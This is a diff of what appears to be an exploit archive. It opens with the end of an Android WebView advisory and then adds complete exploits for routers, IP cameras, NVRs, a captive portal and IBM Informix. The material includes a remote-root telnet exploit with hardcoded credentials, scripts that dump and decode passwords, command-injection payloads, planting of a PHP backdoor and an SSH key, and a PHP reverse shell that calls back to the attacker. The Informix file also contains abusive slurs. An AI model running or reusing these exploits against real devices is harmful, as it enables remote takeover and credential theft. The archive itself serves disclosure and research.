 -:: Proof of Concept ::-
 A successful attack that makes "www.tsearch.com.au" serve the following code:
 <script>
  function execute(cmd){
    return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
  }
  execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a1.bestsafebrowser2.com/owned']);
  execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
  </script>
  This application has been owned.
 Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.
 Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
 -:: Solution ::-
 The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
    WebView webView = new WebView(this);
    setContentView(webView);
    ...
 Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
    <manifest>
    <uses-sdk android:minSdkVersion="17" />
    ...
    </manifest>
 The URL used ("http://www.tsearch.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly).
 Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
    private void exposeJsInterface() {
        if (VERSION.SDK_INT < 17) {
            Log.i(TAG, "addJavascriptInterface() bridge disabled.");
        } else {
            addJavascriptInterface(Object, "EVENT_NAME_HERE");
        }
    }
 References:
 http://50.56.33.56/blog/?p=314
 https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
 https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
 https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
 https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
 Filename: Australian Education App_vv6.apk
 File size: 16,409,964 Bytes
 md5: 86b4fab4328a2c4e54db6f1d378b7bb9
 sha1: 9786bb89fcfff756d10588bf9a3a9c7439dcc74e
 sha256: 2420a3067ba1b120b09ea8737fe8c822b6fea7dd7d860abb84a41611a1f0f7ed
 App Name: Australian Education App
 Package Name: a1.bestsafebrowser2.com
 Package Version: v6
 :)
 === EOF ===
 Video demo:
 https://www.youtube.com/watch?v=_DCz0OqJzBI
 FULL POC Archive:
 https://mega.nz/#!NOp20DZB!mogOpSCFltdEvAVwshgZV-IPvU1ucNvud68DBDCHRD0
 The following is the timeline:
 29 June 2017 - Vendor is notified.
 29 June 2017 - Vendor pulls apps from app store and files privacy and trademark complaints with YouTube. Vendor does not intend to fix vulnerabilities.
 30 June 2017 - All disclosure websites notified, including Exploit-DB.
--- a/platforms/hardware/remote/42355.c
+++ b/platforms/hardware/remote/42355.c
@ -0,0 +1,146 @@
 /*  PK5001Z CenturyLink Router/Modem remote root exploit                  */
 /*             oxagast / Marshall Whittaker                               */
 /* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
 /* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin                     */
 /* PK5001Z CenturyLink Router remote root 0day                            */
 /* Enjoy!                                                                 */
 /*   --oxagast                                                            */
 /* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1         */
 /*                                                                        */
 /* # uname -a; id;                                                        */
 /* Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown  */
 /* uid=0(root) gid=0(root)                                                */
 /* #                                                                      */
 /*                                                                        */
 #include <arpa/inet.h>
 #include <errno.h>
 #include <fcntl.h>
 #include <netdb.h>
 #include <netinet/in.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys/socket.h>
 #include <sys/types.h>
 #include <unistd.h>
 #include <signal.h>
 #define END_STRING "chau\n"
 #define COMPLETE_STRING "fin-respuesta"
 #ifndef MSG_NOSIGNAL
 #define MSG_NOSIGNAL SO_NOSIGPIPE
 #endif
 #define perro(x)                                                               \
  {                                                                            \
    fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, x,                  \
            strerror(errno));                                                  \
    exit(1);                                                                   \
  }
 void send_root(int sock, int pid) {
  char buf[1024] = {0};
  char getal[1024] = "\x61\x64\x6d\x69\x6e\x0a";
  char getap[1024] = "\x43\x65\x6e\x74\x75\x72\x79\x4c\x31\x6e\x6b\x0a";
  char getrl[1024] = "\x73\x75\x20\x72\x6f\x6f\x74\x0a";
  char getrp[1024] = "\x7a\x79\x61\x64\x35\x30\x30\x31";
  recv(sock, buf, 1024 - 1, 0);
  sleep(1);
  if (strncmp(getal, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, getal, strlen(getal) + 1, 0) < 0)
    perro("send");
  recv(sock, buf, 1024 - 1, 0);
  sleep(1);
  if (strncmp(getap, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, getap, strlen(getap) + 1, 0) < 0)
    perro("send");
  sleep(2);
  recv(sock, buf, 1024 - 1, 0);
  if (strncmp(getrl, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, getrl, strlen(getrl) + 1, 0) < 0)
    perro("send");
  sleep(2);
  recv(sock, buf, 1024 - 1, 0);
  if (strncmp(getrp, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, getrp, strlen(getrp) + 1, 0) < 0)
    perro("send");
  sleep(2);
 }
 void send_cmd(int sock, int pid) {
  char str[1024] = {0};
  while (fgets(str, 1024, stdin) == str) {
    if (strncmp(str, END_STRING, strlen(END_STRING)) == 0)
      break;
    if (send(sock, str, strlen(str) + 1, 0) < 0)
      perro("send");
  }
  kill(pid, SIGKILL);
 }
 void sys_info(int sock, int pid) {
  char buf[1024] = {0};
  char sysinfo[1024] = "\nuname -a; id;\n";
  if (strncmp(sysinfo, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, sysinfo, strlen(sysinfo) + 1, 0) < 0)
    perro("send");
  sleep(1);
  int filled = 0;
  while (filled = recv(sock, buf, 1024 - 1, 0)) {
    buf[filled] = '\0';
    printf("%s", buf);
    fflush(stdout);
  }
  kill(pid, SIGKILL);
 }
 void receive(int sock) {
  char buf[1024] = {0};
  int filled = 0;
  while (filled = recv(sock, buf, 1024 - 1, 0)) {
    buf[filled] = '\0';
    printf("%s", buf);
    fflush(stdout);
  }
 }
 int main(int argc, char **argv) {
  if (argc != 2) {
    printf("PK5001Z CenturyLink Router remote root 0day\nEnjoy!\n");
    printf("   --oxagast\n");
    exit(1);
  }
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock == -1)
    perro("socket");
  struct in_addr server_addr;
  if (!inet_aton(argv[1], &server_addr))
    perro("inet_aton");
  struct sockaddr_in connection;
  connection.sin_family = AF_INET;
  memcpy(&connection.sin_addr, &server_addr, sizeof(server_addr));
  connection.sin_port = htons(23);
  if (connect(sock, (const struct sockaddr *)&connection, sizeof(connection)) !=
      0)
    perro("connect");
  sleep(1);
  int pid_root, pid_sys, pid_shell;
  sleep(1);
  send_root(sock, pid_root);
  if (pid_shell = fork())
    sys_info(sock, pid_sys);
  if (pid_shell = fork())
    send_cmd(sock, pid_shell);
  else
    receive(sock);
  return (0);
 }
--- a/platforms/hardware/webapps/41998.txt
+++ b/platforms/hardware/webapps/41998.txt
@ -0,0 +1,19 @@
 # Exploit Title: Zyxel P-660HW-61 < 3.40(PE.11)C0 - Local File Inclusion
 # Date: 2-05-2017
 # Exploit Author: ReverseBrain
 # Contact: https://www.twitter.com/ReverseBrain
 # Vendor Homepage: https://www.zyxel.com
 # Software Link: ftp://ftp.zyxel.com/P-660HW-61/firmware/P-660HW-61_3.40(PE.11)C0.zip
 # Version: 3.40(PE.11)C0
 1. Description
 Any user who can login into the router can exploit the Local File Inclusion
 reading files stored inside the device.
 2. Proof of Concept
 Login into the router and use the path of a file you want to read as
 getpage parameter. For example:
 http://ROUTER_IP/cgi-bin/webcm?getpage=/etc/passwd
--- a/platforms/hardware/webapps/42150.py
+++ b/platforms/hardware/webapps/42150.py
@ -0,0 +1,136 @@
 #Uniview NVR remote passwords disclosure
 #Author: B1t
 # The Uniview NVR web application does not enforce authorizations on the main.cgi file when requesting json data.
 # It says that you can do anything without authentication, however you must know the request structure.
 # In addition, the users' passwords are both hashed and also stored in a reversible way
 # The POC below remotely downloads the device's configuration file, extracts the credentials
 # and decodes the reversible password strings using my crafted map
 # It is worth mention that when you login, the javascript hashes the password with MD5 and pass the request.
 # If the script does retrieve the hash and not the password, you can intercept the request and replace the generated
 # MD5 with the one disclosed using this script
 # Tested on the following models:
 #   NVR304-16E - Software Version B3118P26C00510
 #   NVR301-08-P8 - Software Version B3218P26C00512
 #=09=09=09=09=09=09and version B3220P11
 #
 # Other versions may also be affected
 #Usage: python nvr-pwd-disc.py http://Host_or_IP:PORT
 # Run example:
 # root@k4li:~# python nvr-pwd-disc.py http://192.168.1.5
 #
 # Uniview NVR remote passwords disclosure!
 # Author: B1t
 #
 # [+] Getting model name and software version...
 # Model: NVR301-08-P8
 # Software Version: B3218P26C00512
 #
 # [+] Getting configuration file...
 # [+] Number of users found: 4
 #
 # [+] Extracting users' hashes and decoding reversible strings:
 #
 # User =09|=09 Hash =09|=09 Password
 # _________________________________________________
 # admin =09|=093b9c687b1f4b9d87ed0fdd6abbf7e33d =09|=09<TRIMMED>
 # default =09|=09 =09|=09||||||||||||||||||||
 # HAUser =09|=09288b836a37578141fea6527b5e190120 =09|=09123HAUser123[err
 # test =09|=0951b2454c681f3205f63b8372096d990b =09|=09AA123pqrstuvwxyz
 #
 #  *Note that the users 'default' and 'HAUser' are default and sometimes in=
 accessible remotely
 import requests
 import xml.etree.ElementTree
 import sys
 print "\r\nUniview NVR remote passwords disclosure!"
 print "Author: B1t\r\n"
 def decode_pass(rev_pass):
    pass_dict =3D {'77': '1', '78': '2', '79': '3', '72': '4', '73': '5', '=
 74': '6', '75': '7', '68': '8', '69': '9',
                 '76': '0', '93': '!', '60': '@', '95': '#', '88': '$', '89=
 ': '%', '34': '^', '90': '&', '86': '*',
                 '84': '(', '85': ')', '81': '-', '35': '_', '65': '=3D', '=
 87': '+', '83': '/', '32': '\\', '0': '|',
                 '80': ',', '70': ':', '71': ';', '7': '{', '1': '}', '82':=
 '.', '67': '?', '64': '<', '66': '>',
                 '2': '~', '39': '[', '33': ']', '94': '"', '91': "'", '28'=
 : '`', '61': 'A', '62': 'B', '63': 'C',
                 '56': 'D', '57': 'E', '58': 'F', '59': 'G', '52': 'H', '53=
 ': 'I', '54': 'J', '55': 'K', '48': 'L',
                 '49': 'M', '50': 'N', '51': 'O', '44': 'P', '45': 'Q', '46=
 ': 'R', '47': 'S', '40': 'T', '41': 'U',
                 '42': 'V', '43': 'W', '36': 'X', '37': 'Y', '38': 'Z', '29=
 ': 'a', '30': 'b', '31': 'c', '24': 'd',
                 '25': 'e', '26': 'f', '27': 'g', '20': 'h', '21': 'i', '22=
 ': 'j', '23': 'k', '16': 'l', '17': 'm',
                 '18': 'n', '19': 'o', '12': 'p', '13': 'q', '14': 'r', '15=
 ': 's', '8': 't', '9': 'u', '10': 'v',
                 '11': 'w', '4': 'x', '5': 'y', '6': 'z'}
    rev_pass =3D rev_pass.split(";")
    pass_len =3D len(rev_pass) - rev_pass.count("124")
    password =3D ""
    for char in rev_pass:
        if char !=3D "124": password =3D password + pass_dict[char]
    return pass_len, password
 if len(sys.argv) < 2:
    print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The =
 web interface's port"
    print "\r\nExample: " + sys.argv[0] + " http://192.168.1.1:8850"
    sys.exit()
 elif "http://" not in sys.argv[1] and "https://" not in sys.argv[1]:
 =09print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The w=
 eb interface's port"
 =09sys.exit()
 =09
 host =3D sys.argv[1]
 print "[+] Getting model name and software version..."
 r =3D requests.get(host + '/cgi-bin/main-cgi?json=3D{"cmd":%20116}')
 if r.status_code !=3D 200:
    print "Failed fetching version, got status code: " + r.status_code
 print "Model: " + r.text.split('szDevName":=09"')[1].split('",')[0]
 print "Software Version: " + r.text.split('szSoftwareVersion":=09"')[1].spl=
 it('",')[0]
 print "\r\n[+] Getting configuration file..."
 r =3D requests.get(host + "/cgi-bin/main-cgi?json=3D{%22cmd%22:255,%22szUse=
 rName%22:%22%22,%22u32UserLoginHandle%22:8888888888}")
 if r.status_code !=3D 200:
    print "Failed fetching configuration file, response code: " + r.status_=
 code
    sys.exit()
 root =3D xml.etree.ElementTree.fromstring(r.text)
 print "[+] Number of users found: " + root.find("UserCfg").get("Num")
 print "\r\n[+] Extracting users' hashes and decoding reversible strings:"
 users =3D root.find("UserCfg").getchildren()
 print "\r\nUser \t|\t Hash \t|\t Password"
 print "_________________________________________________"
 for user in users:
    l, p =3D decode_pass(user.get("RvsblePass"))
    print user.get("UserName"), "\t|\t", user.get("UserPass"), "\t|\t", p
 print "\r\n *Note that the users 'default' and 'HAUser' are default and som=
 etimes inaccessible remotely"
--- a/platforms/hardware/webapps/42352.txt
+++ b/platforms/hardware/webapps/42352.txt
@ -0,0 +1,11 @@
 # Exploit Title: IP Camera VACRON VIG-US731VE
 # Date: 2017-07-18
 # Exploit Author: anonymous
 # Vendor Homepage: www.vacron.com
 # Version: V1.0.18-09-B727
 1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg
 2. allows "viewer" level user to fetch any camera setting, eg admin user and password: http://192.168.0.200/vb.htm?adminid&adminpwd
 there is newer firmware available from the vendor, but I haven't tested on that one.
--- a/platforms/hardware/webapps/42450.php
+++ b/platforms/hardware/webapps/42450.php
@ -0,0 +1,50 @@
 <?php
 # Exploit Title: AirMaster 3000M multiple Vulnerabilities
 # Date: 2017/08/12
 # Exploit Author: Koorosh Ghorbani
 # Author Homepage: http://8thbit.net/
 # Vendor Homepage: http://mobinnet.ir/
 # Software Version: V2.0.1B1044
 # Web Server: GoAhead-Webs/2.5.0
 define('isDebug',false);
 define('specialCookie','Cookie: kz_userid=Administrator:1'); //Special Cookie which allow us to execute commands without authentication
 function changePassword(){
 	$pw = "1234"; //New Password
 	$data = "admuser=Administrator&admpass=$pw&admConfirmPwd=$pw" ;
 	$ch = curl_init('http://192.168.1.1/goform/setSysAdm');
 	curl_setopt($ch,CURLOPT_HTTPHEADER,array(
 		specialCookie,
 		'Origin: http://192.168.1.1',
 		'Content-Type: application/x-www-form-urlencoded',
 	));
 	curl_setopt($ch,CURLOPT_POST,1);
 	curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
 	curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
 	$response = curl_exec($ch);
 	if($response == "success"){
 		echo "New Password is : $pw\r\n";
 	}else{
 		echo "Failed\r\n";
 	}
 	if (isDebug){
 		echo $response;
 	}
 }
 function executeCommand(){
 	$data = "pingAddr=`cat /etc/passwd`";
 	$ch = curl_init('http://192.168.1.1/goform/startPing');
 	curl_setopt($ch,CURLOPT_HTTPHEADER,array(
 		specialCookie,
 		'Origin: http://192.168.1.1',
 		'Content-Type: application/x-www-form-urlencoded',
 		"X-Requested-With: XMLHttpRequest",
 		"Referer: http://192.168.1.1/diagnosis_ping.asp"
 	));
 	curl_setopt($ch,CURLOPT_POST,1);
 	curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
 	curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
 	$response = curl_exec($ch);
 	echo $response; //ping: bad address 'admin:XGUaznXz1ncKw:0:0:Adminstrator:/:/bin/sh'
 }
 changePassword();
--- a/platforms/hardware/webapps/42732.py
+++ b/platforms/hardware/webapps/42732.py
@ -0,0 +1,56 @@
 # coding: utf-8
 # Exploit Title: Humax HG100R-* Authentication Bypass
 # Date: 14/09/2017
 # Exploit Author: Kivson
 # Vendor Homepage: http://humaxdigital.com
 # Version: VER 2.0.6
 # Tested on: OSX Linux
 # CVE : CVE-2017-11435
 # The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
 # crafted requests to the management console. The bug is exploitable remotely when the router is configured to
 # expose the management console.
 # The router is not validating the session token while returning answers for some methods in url '/api'.
 # An attacker can use this vulnerability to retrieve sensitive information such
 # as private/public IP addresses, SSID names, and passwords.
 import sys
 import requests
 def print_help():
    print('Exploit syntax error, Example:')
    print('python exploit.py http://192.168.0.1')
 def exploit(host):
    print(f'Connecting to {host}')
    path = '/api'
    payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
    response = requests.post(host + path, data=payload)
    response.raise_for_status()
    if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
            response.json()['result']['WiFi_Info']:
        print('Error, target may be no exploitable')
        return
    for wlan in response.json()['result']['WiFi_Info']['wlan']:
        print(f'Wifi data found:')
        print(f'    SSID: {wlan["ssid"]}')
        print(f'    PWD: {wlan["password"]}')
 def main():
    if len(sys.argv) < 2:
        print_help()
        return
    host = sys.argv[1]
    exploit(host)
 if __name__ == '__main__':
    main()
--- a/platforms/hardware/webapps/42947.txt
+++ b/platforms/hardware/webapps/42947.txt
@ -0,0 +1,38 @@
 # Exploit Title: Fiberhome an5506-04-f  – -PING- COMMAND INJECTION
 # Date: 03.10.2017
 # Exploit Author: Tauco
 # Vendor Homepage: http://hk.fiberhomegroup.com
 # Version: RP2609
 # Tested on: Windows 10
 Description:
 ===========================================================================
 Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
 https://www.owasp.org/index.php/Command_Injection
 Proof of Concepts :
 =======================================
 1. Go to the Default Gateway
 2. Open the application
 3. Open diagnosis
 4. Input command to the Destination Address
 5. Click Ping
 ping_ip=127.0.0.1;whoami;id
 PING 127.0.0.1 (127.0.0.1): 56 data bytes
 64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.617 ms
 64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.259 ms
 64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.215 ms
 64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.214 ms
 64 bytes from 127.0.0.1: seq=4 ttl=64 time=0.218 ms
 --- 127.0.0.1 ping statistics ---
 5 packets transmitted, 5 packets received, 0% packet loss
 round-trip min/avg/max = 0.214/0.304/0.617 ms
 root
 uid=0(root) gid=0 groups=0
--- a/platforms/linux/remote/42949.txt
+++ b/platforms/linux/remote/42949.txt
@ -0,0 +1,17 @@
 # Exploit Title: Unauthenticated remote root code execution on captive
 portal Ucopia <= 5.1
 # Date: 02/10/17
 # Exploit Author: agix
 # Vendor Homepage: http://www.ucopia.com/
 # Version: <= 5.1
 # Don't know in which version they exactly fixed it.
 # When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network
 # First create easier to use php backdoor
 https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
 # As php is in sudoers without password...
 https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
 # Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
 https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27
--- a/platforms/linux/webapps/42187.py
+++ b/platforms/linux/webapps/42187.py
@ -0,0 +1,283 @@
 #!/usr/local/bin/python
 """
 IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
 Bonus: free XXE bug included!
 Download: https://www-01.ibm.com/marketing/iwm/iwm/web/reg/download.do?source=swg-informixfpd&S_PKG=dl&lang=en_US&cp=UTF-8&dlmethod=http
 Twitter: https://twitter.com/rgod777
 Found by: IMgod aka rgay
 About:
 ~~~~~~
 So after Andrea Micalizzi decided to audit this software and found some bugs I decided to audit it too. (see https://blogs.securiteam.com/index.php/archives/3210)
 What's that? Where is all your main frame, super 1337 hacks now rgod? Why did you miss these 3 bugs?
 - unauthed XXE
 - unauthed SQLi
 - unauthed RCE
 Your ub3r 31337 PHP hacks are soooooooooooo cool, maybe you should commit seppuku again. Or maybe you should have taken one of the 143 jobs you were offered? Cos I'm about to rekt dis cunt.
 Vulnerable Code:
 ~~~~~~~~~~~~~~~~
 Of course, rgod misses this bug in openadmin/admin/index.php:
 $admin->run();                                                                  // 1. calls run()
 $idsadmin->html->render();
        function run()
        {
                if ( isset ( $this->idsadmin->in['helpact'] )
                && $this->idsadmin->in['do'] != "doedithelp"
                && $this->idsadmin->in['do'] != "doaddhelp" )
                {
                        header("Location: {$this->idsadmin->get_config("BASEURL")}/index.php?act=help&helpact={$this->idsadmin->in['helpact']}&helpdo={$this->idsadmin->in['helpdo']}");
                        die();
                }
                if ( isset($this->idsadmin->in['lang']) )
                {
                    // If the user has changed the language, set the new language now.
                    $this->idsadmin->validate_lang_param();
                    $this->idsadmin->phpsession->set_lang($this->idsadmin->in['lang']);
                }
                switch( $this->idsadmin->in['do'] )                                                         // 2. switch our do parameter
                {
                        case "getconnections":
                                if ( ! isset($this->idsadmin->in['group_num']) )
                                {
                                        $grpnum = 1;
                                }
                                else
                                {
                                        $grpnum = $this->idsadmin->in['group_num'];
                                }
                                $this->getconnections($grpnum);
                                break;
                        ...
                        case "doconfig":
                                $this->idsadmin->html->set_pagetitle($this->idsadmin->lang("OATconfig"));
                                $this->doconfig();                                                          // 3. calls doconfig
                                break;
 Now, onto the doconfig function:
        function doconfig()
        {
                // None of the config parameters can contain quotes.
                foreach ($this->idsadmin->in as $i => $v)
                {
                        if (strstr($v,"\"") || strstr($v,"'"))
                        {
                                $this->idsadmin->load_lang("global");
                                $this->idsadmin->error($this->idsadmin->lang("invalidParamNoQuotes",array($i)));
                                $this->config();
                                return;
                        }
                }
                $conf_vars = array (
        "LANG"         => $this->idsadmin->lang("LANG")
        ,"CONNDBDIR"    => $this->idsadmin->lang("CONNDBDIR")
        ,"BASEURL"      => $this->idsadmin->lang("BASEURL")
        ,"HOMEDIR"      => $this->idsadmin->lang("HOMEDIR")
        ,"HOMEPAGE"     => $this->idsadmin->lang("HOMEPAGE")
        ,"PINGINTERVAL" => $this->idsadmin->lang("PINGINTERVAL")
        ,"ROWSPERPAGE" => $this->idsadmin->lang("ROWSPERPAGE")
        ,"SECURESQL"    => $this->idsadmin->lang("SECURESQL")
        ,"INFORMIXCONTIME"      => $this->idsadmin->lang("INFORMIXCONTIME")
        ,"INFORMIXCONRETRY"     => $this->idsadmin->lang("INFORMIXCONRETRY")
        );
        # create backup of file
        $src=$this->idsadmin->get_config('HOMEDIR')."/conf/config.php";
        $dest=$this->idsadmin->in['HOMEDIR']."/conf/BAKconfig.php";
        copy($src,$dest);
        # open the file
        if (! is_writable($src))
        {
                $this->config($this->idsadmin->lang("SaveCfgFailure"). " $src");
                return;
        }
        $fd = fopen($src,'w+');                                                                 // 4. get a handle to a php file
        # write out the conf
        fputs($fd,"<?php \n");
        foreach ($conf_vars as $k => $v)
        {
                if ($k == "CONNDBDIR" || $k == "HOMEDIR")
            {
                // Replace backslashes in paths with forward slashes
                $this->idsadmin->in[$k] = str_replace('\\', '/', $this->idsadmin->in[$k]);
            }
                $out = "\$CONF['{$k}']=\"{$this->idsadmin->in[$k]}\";  #{$v}\n";                // 5. dangerous
                fputs($fd,$out);                                                                // 6. PHP Injection
        }
        fputs($fd,"?>\n");
        fclose($fd);
        $this->idsadmin->html->add_to_output($this->idsadmin->template["template_global"]->global_redirect($this->idsadmin->lang("SaveCfgSuccess"),"index.php?act=admin"));
        } #end config
 I suspect Andrea missed this bug because of this code:
                // None of the config parameters can contain quotes.
                foreach ($this->idsadmin->in as $i => $v)
                {
                        if (strstr($v,"\"") || strstr($v,"'"))                          // check for double quotes
                        {
                                $this->idsadmin->load_lang("global");
                                $this->idsadmin->error($this->idsadmin->lang("invalidParamNoQuotes",array($i)));
                                $this->config();
                                return;
                        }
                }
 I'm sure his assumption was that if you can't break out of the double quotes, you can't get RCE. Well, MR I have 40 years experiance.
 Example:
 ~~~~~~~~
 sh-3.2$ ./poc.py 
    IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
    Found By: IMgod aka rgay
 (+) usage: ./poc.py <target> <connectback:port>
 (+) eg: ./poc.py 192.168.1.172 192.168.1.1:1111
 sh-3.2$ ./poc.py 192.168.1.172 192.168.1.1:1111
    IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
    Found By: IMgod aka rgay
 (+) PHP code injection done!
 (+) starting handler on port 1111
 (+) connection from 172.16.175.172
 (+) popping a shell!
 id
 uid=2(daemon) gid=2(daemon) groups=1(bin),2(daemon)
 uname -a
 Linux informixva 2.6.27.39-0.3-pae #1 SMP 2009-11-23 12:57:38 +0100 i686 i686 i386 GNU/Linux
 """
 import sys
 import requests
 import telnetlib
 import socket
 from threading import Thread
 from base64 import b64encode as b64e
 def banner():
    return """\n\tIBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)\n\tFound by: IMgod aka rgay\n"""
 def check_args():
    global t, ls, lp
    if len(sys.argv) < 3:
        return False
    t  = "http://%s/openadmin/admin/index.php?act=admin&do=doimport" % sys.argv[1]
    ls = sys.argv[2].split(":")[0]
    lp = int(sys.argv[2].split(":")[1])
    return True
 def handler(lport):
    print "(+) starting handler on port %d" % lport
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lport))
    s.listen(1)
    conn, addr = s.accept()
    print "(+) connection from %s" % addr[0]
    t.sock = conn
    print "(+) popping a shell!"
    t.interact()
 # build the reverse php shell
 def build_php_code():
    phpkode  = ("""
    @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
    phpkode += ("""$dis=@ini_get('disable_functions');""")
    phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
    phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
    phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
    phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
    phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
    phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
    phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
    phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
    phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
    phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
    phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
    phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
    phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
    phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
    phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
    phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
    phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
    phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
    phpkode += ("""$nofuncs='no exec functions'; """)
    phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
    phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (ls, lp))
    phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
    phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
    phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
    phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
    phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (ls, lp))
    phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
    phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
    phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
    phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
    phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
    phpkode += ("""}@socket_close($s);} """)
    return phpkode
 def suntzu_omfg_no_one_can_steal_my_software_yo():
    handlerthr = Thread(target=handler, args=(lp,))
    handlerthr.start()
    target = "http://127.0.0.1/openadmin/conf/config.php?c=eval%%28base64_decode%%28%%27%s%%27%%29%%29%%3b" % b64e(build_php_code())
    p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
    f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
    r = requests.post("%s" % t, files=f)
 def suntzu_omfg_i_am_40_years_old_and_fuckn_fat():
